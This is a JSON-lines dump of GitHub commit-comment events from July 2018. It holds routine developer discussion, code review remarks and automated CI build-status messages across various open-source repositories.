{"id":"7997784449","type":"CommitCommentEvent","actor":{"login":"stevengj"},"repo":{"name":"stevengj/libctl"},"payload":{"comment":{"id":29786371,"position":94,"line":2367,"path":"utils/geom.c","commit_id":"9f09e79765f92345ad4f4f04136597b4f0e43f25","created_at":"2018-07-21T01:07:46Z","updated_at":"2018-07-21T01:07:46Z","author_association":"OWNER","body":"No, because `d` is the in-plane distance, distance to the edges from the projection of the point into the plane.\r\n\r\nThat being said, it seems like the code might be simplified by skipping the projection step and doing:\r\n```c\r\n   if(inside==0) { \r\n     vector3 p01 = vector3_plus(o,v1);\r\n     vector3 p10 = vector3_plus(o,v2);\r\n     vector3 p11 = vector3_plus(p01,v2);\r\n     d=       min_distance_to_line_segment(p,   o, p01);\r\n     d=fmin(d,min_distance_to_line_segment(p,   o, p10));\r\n     d=fmin(d,min_distance_to_line_segment(p, p01, p11));\r\n     *min_distance=fmin(d,min_distance_to_line_segment(p, p11, p10));\r\n   }\r\n   else\r\n     *min_distance=fabs(s);\r\n```"}},"created_at":"2018-07-21T01:07:46Z"}
{"id":"7997786960","type":"CommitCommentEvent","actor":{"login":"JohnyGall"},"repo":{"name":"JumboCode/PeopleMakingADifference"},"payload":{"comment":{"id":29786382,"position":null,"line":null,"path":null,"commit_id":"5bc78b319e855c92fb3394bdbd241989b2533bd8","created_at":"2018-07-21T01:09:40Z","updated_at":"2018-07-21T01:09:40Z","author_association":"COLLABORATOR","body":"All files are of a suitable resolution and I will tolerate no argument on this point "}},"created_at":"2018-07-21T01:09:40Z"}
{"id":"7997788658","type":"CommitCommentEvent","actor":{"login":"Freso"},"repo":{"name":"loot/fallout4"},"payload":{"comment":{"id":29786391,"position":null,"line":null,"path":null,"commit_id":"27d758d1cbf3fed94a35062b786e6d69437d8f52","created_at":"2018-07-21T01:10:58Z","updated_at":"2018-07-21T01:10:58Z","author_association":"MEMBER","body":"Do we want to add all Creation Club plugins to the masterlist? I've written a script that reads a .ccc file and outputs a text blurb ready for copy/pasting into a masterlist, but the output is a bit of a mouthful."}},"created_at":"2018-07-21T01:10:58Z"}
{"id":"7997790484","type":"CommitCommentEvent","actor":{"login":"Maxopoly"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29786396,"position":63,"line":63,"path":"src/main/java/com/github/cranite/MoreEnchantables/Configuration.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T01:12:13Z","updated_at":"2018-07-21T01:12:13Z","author_association":"OWNER","body":"Yes as long as you don't just catch Exception, but specifically what you want to handle. In ItemExchanges case that would be ExchangeRuleParseException. Feel free to make new exceptions for your own plugin as needed."}},"created_at":"2018-07-21T01:12:13Z"}
{"id":"7997791300","type":"CommitCommentEvent","actor":{"login":"narspt"},"repo":{"name":"juribeparada/MMDVM_HS"},"payload":{"comment":{"id":29786397,"position":null,"line":null,"path":null,"commit_id":"46ba5cc4f74d072aa545fd54fc5b64bb473e65bd","created_at":"2018-07-21T01:12:55Z","updated_at":"2018-07-21T01:12:55Z","author_association":"NONE","body":"Hi Andy, After 3 days testing the firmware with your change I (as well as my two friends also testing it) could never reproduce the problem again, even testing far from the hotspot, etc... I don't get the \"transmission lost\" lines on my logs at all anymore, no unrecoverable transmission cuts or any issues at all.\r\n\r\nSince testing this firmware I could actually only get \"transmission lost\" lines when I purposely interfered on the hotspot freq. using a 2nd radio to mute the DStar one, and only if I do it for some 2 or 3 seconds - obviously that is normal and intended - also it did recover properly after stopping the interference.\r\n\r\nI think it's safe to say that your change didn't just improved the problem... your change really fixed it! :)\r\nYou can probably release it, if you think so, as it is an important fix (actually I can't understand how there wasn't more people reporting this? I know others that suffered from it, not just me really...). Thank you!"}},"created_at":"2018-07-21T01:12:55Z"}
{"id":"7997791870","type":"CommitCommentEvent","actor":{"login":"et304383"},"repo":{"name":"gpg/gnupg"},"payload":{"comment":{"id":29786399,"position":null,"line":null,"path":null,"commit_id":"0cfdd3b57d592fb6baa7dafe8fde124e8a6c7798","created_at":"2018-07-21T01:13:23Z","updated_at":"2018-07-21T01:13:23Z","author_association":"NONE","body":"What are the odds of pushing this fix to gpg included in Ubuntu 18.04?\r\n\r\nDue to this issue:\r\n\r\nhttps://github.com/Microsoft/WSL/issues/3286\r\n"}},"created_at":"2018-07-21T01:13:23Z"}
{"id":"7997791991","type":"CommitCommentEvent","actor":{"login":"WIFIWIF"},"repo":{"name":"github/opensource.guide"},"payload":{"comment":{"id":29786400,"position":null,"line":null,"path":null,"commit_id":"65b59a4c7b365199e99fca77885deba60e3f68d5","created_at":"2018-07-21T01:13:29Z","updated_at":"2018-07-21T01:13:29Z","author_association":"NONE","body":"\r\n[Pivotal_EDU_PCFDeveloper_TrainingBrief.pdf](https://github.com/github/opensource.guide/files/2215783/Pivotal_EDU_PCFDeveloper_TrainingBrief.pdf)\r\n"}},"created_at":"2018-07-21T01:13:29Z"}
{"id":"7997801793","type":"CommitCommentEvent","actor":{"login":"LIULi-VVET"},"repo":{"name":"grpc/grpc-java"},"payload":{"comment":{"id":29786434,"position":null,"line":null,"path":null,"commit_id":"146b6006b3cc003f68100d10da4ffce8225cc31d","created_at":"2018-07-21T01:21:12Z","updated_at":"2018-07-21T01:21:12Z","author_association":"NONE","body":"I implemented Google’s status report.\r\nUse the proto file to generate java code according to the official website (https://developers.google.com/actions/smarthome/report-state.)\r\nThe generated code references the io.grpc.stub.annotations.RpcMethod file.\r\nFound that there is no io.grpc.stub.annotations.RpcMethod file in the jar package downloaded by maven.\r\nThen I found this file for your GitHub project.\r\nBut I found that the generated code fields are different.\r\n\r\nthis is generated code:\r\n`\r\n@io.grpc.stub.annotations.RpcMethod(\r\n      fullServiceName = \"google.home.graph.v1.HomeGraphApiService\",\r\n      methodName = \"ReportStateAndNotification\",\r\n      requestType = com.google.home.graph.v1.ReportStateAndNotificationRequest.class,\r\n      responseType = com.google.home.graph.v1.ReportStateAndNotificationResponse.class,\r\n      methodType = io.grpc.MethodDescriptor.MethodType.UNARY)\r\n`\r\n\r\n"}},"created_at":"2018-07-21T01:21:12Z"}
{"id":"7997802294","type":"CommitCommentEvent","actor":{"login":"pjpimentel"},"repo":{"name":"prismagraphql/dots"},"payload":{"comment":{"id":29786435,"position":null,"line":null,"path":null,"commit_id":"0d3c57bd253c53bb657f10f6962f87e8e184505b","created_at":"2018-07-21T01:21:35Z","updated_at":"2018-07-21T01:21:35Z","author_association":"NONE","body":"Hey, i've just checked the DO docs again.\r\nLooks like type **string** is the correct one, could you create a **[PR](https://github.com/pjpimentel/dots/compare/beta...prismagraphql:fix-droplet-user-data)** for this change to **BETA** branch?"}},"created_at":"2018-07-21T01:21:35Z"}
{"id":"7997817044","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29786476,"position":null,"line":null,"path":null,"commit_id":"c4e543c26a496270334e1b5ebfde662fd888d175","created_at":"2018-07-21T01:33:28Z","updated_at":"2018-07-21T01:33:28Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 546](https://ci.hashicorp.engineering/viewLog.html?buildId=105824&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-21T01:33:28Z"}
{"id":"7997817368","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29786477,"position":null,"line":null,"path":null,"commit_id":"c4e543c26a496270334e1b5ebfde662fd888d175","created_at":"2018-07-21T01:33:47Z","updated_at":"2018-07-21T01:33:47Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 546](https://ci.hashicorp.engineering/viewLog.html?buildId=105824&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:19"}},"created_at":"2018-07-21T01:33:47Z"}
{"id":"7997817380","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29786478,"position":null,"line":null,"path":null,"commit_id":"c4e543c26a496270334e1b5ebfde662fd888d175","created_at":"2018-07-21T01:33:47Z","updated_at":"2018-07-21T01:33:47Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 547](https://ci.hashicorp.engineering/viewLog.html?buildId=105825&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-21T01:33:47Z"}
{"id":"7997818097","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29786480,"position":null,"line":null,"path":null,"commit_id":"c4e543c26a496270334e1b5ebfde662fd888d175","created_at":"2018-07-21T01:34:23Z","updated_at":"2018-07-21T01:34:23Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 547](https://ci.hashicorp.engineering/viewLog.html?buildId=105825&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:35"}},"created_at":"2018-07-21T01:34:23Z"}
{"id":"7997818100","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29786481,"position":null,"line":null,"path":null,"commit_id":"82c1e98e309ae94260000e81b7ea41aa9ebc7816","created_at":"2018-07-21T01:34:23Z","updated_at":"2018-07-21T01:34:23Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 548](https://ci.hashicorp.engineering/viewLog.html?buildId=105826&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-21T01:34:23Z"}
{"id":"7997818480","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29786482,"position":null,"line":null,"path":null,"commit_id":"82c1e98e309ae94260000e81b7ea41aa9ebc7816","created_at":"2018-07-21T01:34:41Z","updated_at":"2018-07-21T01:34:41Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 548](https://ci.hashicorp.engineering/viewLog.html?buildId=105826&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:16"}},"created_at":"2018-07-21T01:34:41Z"}
{"id":"7997820434","type":"CommitCommentEvent","actor":{"login":"dan-zheng"},"repo":{"name":"tensorflow/swift"},"payload":{"comment":{"id":29786484,"position":null,"line":null,"path":null,"commit_id":"cae679a6d58a61bd7d043463010113746825f35d","created_at":"2018-07-21T01:36:18Z","updated_at":"2018-07-21T01:36:18Z","author_association":"MEMBER","body":"Awesome!"}},"created_at":"2018-07-21T01:36:18Z"}
{"id":"7997821740","type":"CommitCommentEvent","actor":{"login":"holmesal"},"repo":{"name":"holmesal/react-native-slider"},"payload":{"comment":{"id":29786487,"position":null,"line":null,"path":null,"commit_id":"5bf33404a2217c43c055d45f66372b898fc4fcd8","created_at":"2018-07-21T01:37:20Z","updated_at":"2018-07-21T01:37:20Z","author_association":"OWNER","body":"Can you provide a repo that demonstrates the issue\n\nOn Fri, Jul 20, 2018 at 10:23 AM, dom <notifications@github.com> wrote:\n\n> cool\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/holmesal/react-native-slider/commit/5bf33404a2217c43c055d45f66372b898fc4fcd8#commitcomment-29781009>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABGB_oFiBcZGAX3S1FJzYWcZHbrYnEqYks5uIfXmgaJpZM4VYNyG>\n> .\n>\n-- \nAlonso Holmes\nholmesal@bu.edu\n"}},"created_at":"2018-07-21T01:37:20Z"}
{"id":"7997822362","type":"CommitCommentEvent","actor":{"login":"nehpetskie"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29786488,"position":null,"line":null,"path":null,"commit_id":"a942853d55dd0e96ff98e6c352e2c2a9e000ea86","created_at":"2018-07-21T01:37:51Z","updated_at":"2018-07-21T01:37:51Z","author_association":"NONE","body":"why ?? always error on Skill.Cpp\r\n"}},"created_at":"2018-07-21T01:37:51Z"}
{"id":"7997822767","type":"CommitCommentEvent","actor":{"login":"nehpetskie"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29786489,"position":null,"line":null,"path":null,"commit_id":"a942853d55dd0e96ff98e6c352e2c2a9e000ea86","created_at":"2018-07-21T01:38:12Z","updated_at":"2018-07-21T01:38:12Z","author_association":"NONE","body":"![git prob](https://user-images.githubusercontent.com/18148445/43030891-c6714a6a-8cc9-11e8-8eec-d4455dcabc86.png)\r\n"}},"created_at":"2018-07-21T01:38:12Z"}
{"id":"7997827568","type":"CommitCommentEvent","actor":{"login":"piaolin"},"repo":{"name":"piaolin/hubu"},"payload":{"comment":{"id":29786505,"position":null,"line":null,"path":null,"commit_id":"1aef6016c4badb2412d53cf39d208a99c88eb301","created_at":"2018-07-21T01:42:17Z","updated_at":"2018-07-21T01:42:17Z","author_association":"OWNER","body":"mail.hubu.edu.cn压缩包下载"}},"created_at":"2018-07-21T01:42:17Z"}
{"id":"7997828085","type":"CommitCommentEvent","actor":{"login":"nmcmahon3027"},"repo":{"name":"nmcmahon3027/Notes"},"payload":{"comment":{"id":29786506,"position":16,"line":16,"path":"README.md","commit_id":"c4c8bde9a733c676ccbfbfc6ba0dd50d4e106b47","created_at":"2018-07-21T01:42:42Z","updated_at":"2018-07-21T01:42:42Z","author_association":"OWNER","body":"Youtube"}},"created_at":"2018-07-21T01:42:42Z"}
{"id":"7997829080","type":"CommitCommentEvent","actor":{"login":"taoyouxian"},"repo":{"name":"hyperledger/fabric-samples"},"payload":{"comment":{"id":29786507,"position":null,"line":null,"path":null,"commit_id":"dd12f88dc0d48b44b799b3a223b2b6a581fb78f7","created_at":"2018-07-21T01:43:33Z","updated_at":"2018-07-21T01:43:33Z","author_association":"NONE","body":"Hello, I make a test following the rule \r\n\r\n> Note that docType and owner fields must be prefixed with the \"data\" wrapper\r\n\r\n when creating marble index, but failed.\r\n\r\nI remove the **`data`** in **`curl -i -X ...`** and run, it can give result when I run **`peer chaincode query...`**, so I write this for confirmation."}},"created_at":"2018-07-21T01:43:33Z"}
{"id":"7997829527","type":"CommitCommentEvent","actor":{"login":"SOJ3"},"repo":{"name":"minglich/logitech-pubg"},"payload":{"comment":{"id":29786510,"position":null,"line":null,"path":null,"commit_id":"31e652dbd25ffe42c71191fd44cff07216c41b72","created_at":"2018-07-21T01:43:58Z","updated_at":"2018-07-21T01:43:58Z","author_association":"NONE","body":"Hey, just a quick question. What does the \"control_key\" do and what does the \"full_mode_key\" mean?"}},"created_at":"2018-07-21T01:43:58Z"}
{"id":"7997831163","type":"CommitCommentEvent","actor":{"login":"ArnavSood"},"repo":{"name":"econtoolkit/tutorials"},"payload":{"comment":{"id":29786516,"position":null,"line":null,"path":null,"commit_id":"11285c3ccbaf76a18b582c70b14f6e4a2f48fb4c","created_at":"2018-07-21T01:45:16Z","updated_at":"2018-07-21T01:45:16Z","author_association":"COLLABORATOR","body":"@jlperla This was supposed to be a pull request. But Julia v0.7 always complains about `@schedule` when I open it, and from what I can tell, this works on v0.6 as well. "}},"created_at":"2018-07-21T01:45:16Z"}
{"id":"7997833398","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29786521,"position":null,"line":null,"path":null,"commit_id":"159a48ba1078a0a505600d301380a991e626d4ea","created_at":"2018-07-21T01:47:01Z","updated_at":"2018-07-21T01:47:01Z","author_association":"NONE","body":"For your test you have to enter the correct bench for the base_tag. The auto-filled value is here wrong because you doesn't test against latest master."}},"created_at":"2018-07-21T01:47:01Z"}
{"id":"7997833775","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29786522,"position":null,"line":null,"path":null,"commit_id":"aa0d16f56b64730370a1fc1fb6af287accbc701a","created_at":"2018-07-21T01:47:18Z","updated_at":"2018-07-21T01:47:18Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.237`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/237) :tada:"}},"created_at":"2018-07-21T01:47:18Z"}
{"id":"7997836209","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29786528,"position":null,"line":null,"path":null,"commit_id":"aa0d16f56b64730370a1fc1fb6af287accbc701a","created_at":"2018-07-21T01:49:08Z","updated_at":"2018-07-21T01:49:08Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.359`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/406490026) :tada:"}},"created_at":"2018-07-21T01:49:08Z"}
{"id":"7997836666","type":"CommitCommentEvent","actor":{"login":"superqw3rty"},"repo":{"name":"superqw3rty/665451-pink"},"payload":{"comment":{"id":29786531,"position":null,"line":null,"path":null,"commit_id":"7c82ab9311882e28a8b5684cd0eeefedd5af881b","created_at":"2018-07-21T01:49:32Z","updated_at":"2018-07-21T01:49:32Z","author_association":"OWNER","body":"fix"}},"created_at":"2018-07-21T01:49:32Z"}
{"id":"7997842136","type":"CommitCommentEvent","actor":{"login":"Shana6"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29786544,"position":null,"line":null,"path":null,"commit_id":"9de291a05c3e50682536a6f31787c5238097b66b","created_at":"2018-07-21T01:53:33Z","updated_at":"2018-07-21T01:53:33Z","author_association":"CONTRIBUTOR","body":"owo\n________________________________\nFrom: Kayla <notifications@github.com>\nSent: Friday, July 20, 2018 4:20:32 PM\nTo: MonikaDiscord/Monika\nCc: Sanae; Comment\nSubject: Re: [MonikaDiscord/Monika] pretty sure that's supposed to be $2 (9de291a)\n\n\nuwu\n\n—\nYou are receiving this because you commented.\nReply to this email directly, view it on GitHub<https://github.com/MonikaDiscord/Monika/commit/9de291a05c3e50682536a6f31787c5238097b66b#commitcomment-29785439>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AfGDRBRWalIdlQIkE4b0IOwu8JZxxA3nks5uIlewgaJpZM4VZVpL>.\n"}},"created_at":"2018-07-21T01:53:33Z"}
{"id":"7997843497","type":"CommitCommentEvent","actor":{"login":"arpadav"},"repo":{"name":"Mochael/ShoutBid"},"payload":{"comment":{"id":29786549,"position":null,"line":null,"path":null,"commit_id":"59ca2e0007e0f8133e2bcc773efef09d7ea9b956","created_at":"2018-07-21T01:54:43Z","updated_at":"2018-07-21T01:54:43Z","author_association":"COLLABORATOR","body":"read what full commit says. \r\n- express-session is never used and never will be.. \r\n- i removed http-errors due to being annoying (if errors occur they are already thrown in the terminal or rendered to screen, http-errors just made it look nicer?? just useless). \r\n- removed package.json bc thats not a dependency lmfaoooo. \r\n- removed connect-mongo bc michael was trying to connect to a mongo cluster w/ mongo atlas, but we do not need that\r\n- and lastly, removed bootstrap dependency. since the code is loading bootstrap and its dependencies (jquery and popper.js) with the BootstrapCDN, no need for it to be a node module. HOWEVER, i am currently in the process of loading bootstrap locally."}},"created_at":"2018-07-21T01:54:43Z"}
{"id":"7997843674","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29786552,"position":null,"line":null,"path":null,"commit_id":"baceb8693d268c14bea7cdbe419d9d434f26c95c","created_at":"2018-07-21T01:54:51Z","updated_at":"2018-07-21T01:54:51Z","author_association":"NONE","body":"Congratulations on this Elo-gaining simplification!"}},"created_at":"2018-07-21T01:54:51Z"}
{"id":"7997843714","type":"CommitCommentEvent","actor":{"login":"1Bennell"},"repo":{"name":"websockets/ws"},"payload":{"comment":{"id":29786553,"position":29,"line":51,"path":"lib/Extensions.js","commit_id":"c4fe46608acd61fbf7397eadc47378903f95b78a","created_at":"2018-07-21T01:54:53Z","updated_at":"2018-07-21T01:54:53Z","author_association":"NONE","body":"Push"}},"created_at":"2018-07-21T01:54:53Z"}
{"id":"7997844984","type":"CommitCommentEvent","actor":{"login":"charris"},"repo":{"name":"MacPython/numpy-wheels"},"payload":{"comment":{"id":29786557,"position":null,"line":null,"path":null,"commit_id":"3d0da6b6acac050e67509ed6a469dba1602b1890","created_at":"2018-07-21T01:55:49Z","updated_at":"2018-07-21T01:55:49Z","author_association":"CONTRIBUTOR","body":"@matthew-brett the Mac build is broken"}},"created_at":"2018-07-21T01:55:49Z"}
{"id":"7997845578","type":"CommitCommentEvent","actor":{"login":"KnifuWaifu"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29786560,"position":null,"line":null,"path":null,"commit_id":"9de291a05c3e50682536a6f31787c5238097b66b","created_at":"2018-07-21T01:56:18Z","updated_at":"2018-07-21T01:56:18Z","author_association":"NONE","body":"awoo"}},"created_at":"2018-07-21T01:56:18Z"}
{"id":"7997846789","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"ximinez/rippled"},"payload":{"comment":{"id":29786563,"position":null,"line":null,"path":null,"commit_id":"36b8d5c5e21af3e767fb4f262d15bbe6e99d624b","created_at":"2018-07-21T01:57:08Z","updated_at":"2018-07-21T01:57:08Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/ximinez/rippled/commit/36b8d5c5e21af3e767fb4f262d15bbe6e99d624b)\n\nBuilt at __20180721 - 01:57:08__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nrpm | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/19//artifact/rpm.txt) | 1034 cases, 0 failed, t: n/a | PASS :white_check_mark: \nmsvc.debug | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/19//artifact/msvc.debug.txt) | 1032 cases, 0 failed, t: 582s | PASS :white_check_mark: \ncoverage | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/19//artifact/coverage.txt) | 1035 cases, 0 failed, t: 693s | PASS :white_check_mark: \ndocs | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/19//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/19//artifact/gcc.release.unity_Dassert_true_MANUAL_TESTS_true.txt) | 1101 cases, 1 failed, t: 802s | FAIL :red_circle: \nclang.debug.unity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/19//artifact/clang.debug.unity.txt) | 1035 cases, 0 failed, t: 254s | PASS :white_check_mark: \nclang.debug.unity, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/19//artifact/clang.debug.unity_PARALLEL_TESTS_false.txt) | 1035 cases, 0 failed, t: 501s | PASS :white_check_mark: \nmsvc.debug, <br/>PROJECT_NAME=rippled_classic | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/19//artifact/msvc.debug_PROJECT_NAME_rippled_classic.txt) | 1032 cases, 0 failed, t: 1265s | PASS :white_check_mark: \ngcc.debug.unity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/19//artifact/gcc.debug.unity.txt) | 1035 cases, 0 failed, t: 251s | PASS :white_check_mark: \nclang.debug.nounity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/19//artifact/clang.debug.nounity.txt) | 1033 cases, 0 failed, t: 675s | PASS :white_check_mark: \nclang.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/19//artifact/clang.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 340s | PASS :white_check_mark: \nmsvc.release | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/19//artifact/msvc.release.txt) | 1031 cases, 0 failed, t: 530s | PASS :white_check_mark: \ngcc.debug.nounity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/19//artifact/gcc.debug.nounity.txt) | 1033 cases, 0 failed, t: 606s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/19//artifact/gcc.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 358s | PASS :white_check_mark: \ngcc.debug.unity <br/>-Dstatic=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/19//artifact/gcc.debug.unity_Dstatic_true.txt) | 1035 cases, 0 failed, t: 252s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-21T01:57:08Z"}
{"id":"7997848327","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29786566,"position":null,"line":null,"path":null,"commit_id":"db021b73d1de2dea1fd04ff7c5a79302680b6e99","created_at":"2018-07-21T01:58:17Z","updated_at":"2018-07-21T01:58:17Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/93/display/redirect) (on internal Jenkins) failed in stage 'Test docs' 🔥\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/93//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/db021b73d1de2dea1fd04ff7c5a79302680b6e99/93/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/db021b73d1de2dea1fd04ff7c5a79302680b6e99/93/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/db021b73d1de2dea1fd04ff7c5a79302680b6e99/93/jenkins-results/generator-diff/index.html) (please review changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/db021b73d1de2dea1fd04ff7c5a79302680b6e99/93/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-21T01:58:17Z"}
{"id":"7997848452","type":"CommitCommentEvent","actor":{"login":"arpadav"},"repo":{"name":"Mochael/ShoutBid"},"payload":{"comment":{"id":29786567,"position":null,"line":null,"path":null,"commit_id":"59ca2e0007e0f8133e2bcc773efef09d7ea9b956","created_at":"2018-07-21T01:58:23Z","updated_at":"2018-07-21T01:58:23Z","author_association":"COLLABORATOR","body":"forgot to mention, currently, cookie-parser, bcrypt-nodejs, and debug are the only modules which are install and not being used. \r\n\r\nwe will use them in the future. cookie-parser for obvious reasons, debug once the project gets big, and bcrypt-nodejs to have server-side encryption on stuff like passwords"}},"created_at":"2018-07-21T01:58:23Z"}
{"id":"7997848707","type":"CommitCommentEvent","actor":{"login":"ensiform"},"repo":{"name":"eternalcodes/EternalJK"},"payload":{"comment":{"id":29786568,"position":null,"line":null,"path":null,"commit_id":"e8c24f0cd83ef25559d8749414252aa03ac8b282","created_at":"2018-07-21T01:58:34Z","updated_at":"2018-07-21T01:58:34Z","author_association":"NONE","body":"Why is this necessary?  Xycaleth patched the problem upstream, you can also alternatively use double precision in some of the patch functions instead."}},"created_at":"2018-07-21T01:58:34Z"}
{"id":"7998370930","type":"CommitCommentEvent","actor":{"login":"bilaltariq2122"},"repo":{"name":"parthbkgadoya/Image-based-Human-Age-and-Gender-Estimation"},"payload":{"comment":{"id":29788079,"position":null,"line":null,"path":null,"commit_id":"2d9977cd4ad365ba7b7c946bce86ab924abf94e7","created_at":"2018-07-21T10:00:02Z","updated_at":"2018-07-21T10:00:02Z","author_association":"NONE","body":"thanks\n\nBilal Tariq!!!!\n\n\nOn Sat, Jul 21, 2018 at 1:00 PM Part Gadoya <notifications@github.com>\nwrote:\n\n> At max, I can give you algorithm:\n> 1. Create training and testing dataset.\n> 2. Give training data to BIF algorithm and it will give you feature vector.\n> 3. Now, give label of age and gender to each feature vector. Create\n> datapoints like this (feature_vector*(i), *age(*i*), *gender(*i*)*)\n> 4. Give this labelled dataset to KPLS algorithm. (MATLAB inbuilt function)\n> 5. KPLS will give coefficients of regression equation.\n> 6. Testing : Give testing images to BIF. It will give feature vector.\n> 7. Put values of feature vector into regression equation and predict age\n> and gender (use thresholding here).\n> 8. Evaluate your model. Compute cost using true value against predicted\n> value.\n>\n> And you are done. In case of further queries refer KPLS research papers,\n> BIF research paper. Also try to understand dimensionality reduction.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/parthbkgadoya/Image-based-Human-Age-and-Gender-Estimation/commit/2d9977cd4ad365ba7b7c946bce86ab924abf94e7#commitcomment-29787734>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AidTJ-0Q8nuYIHzxJxAwP_bbgm0WiOf5ks5uIt-NgaJpZM4VXAP_>\n> .\n>\n"}},"created_at":"2018-07-21T10:00:02Z"}
{"id":"7998377681","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AShalysh/ruby_tasks"},"payload":{"comment":{"id":29788091,"position":31,"line":31,"path":"lesson8/accessors.rb","commit_id":"0cabccb1066ef868ddd31f73dbb4fb3184164785","created_at":"2018-07-21T10:05:54Z","updated_at":"2018-07-21T10:05:54Z","author_association":"NONE","body":"здесь лучше выбрасывать исключение"}},"created_at":"2018-07-21T10:05:54Z"}
